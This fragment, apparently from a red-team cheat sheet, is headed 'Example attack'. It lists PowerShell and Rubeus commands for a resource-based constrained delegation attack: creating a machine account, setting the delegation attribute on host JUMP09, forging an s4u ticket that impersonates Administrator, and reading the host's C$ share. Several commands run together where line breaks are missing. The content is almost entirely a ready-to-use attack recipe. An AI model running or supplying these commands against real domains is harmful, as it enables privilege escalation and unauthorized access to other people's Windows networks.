Example attack
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2032401531-514583578-4118054891-6101)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer JUMP09 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}.\Rubeus.exe hash /password:Summer2018!
rc4_hmac : EF266C6B963C0BB683941032008AD47F.\Rubeus.exe s4u /user:attackersystem$ /domain:ops.comply.com /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:http/jump09 /altservice:cifs,host /ptt /nowrapdir \\jump09\c$Tooling
Last updated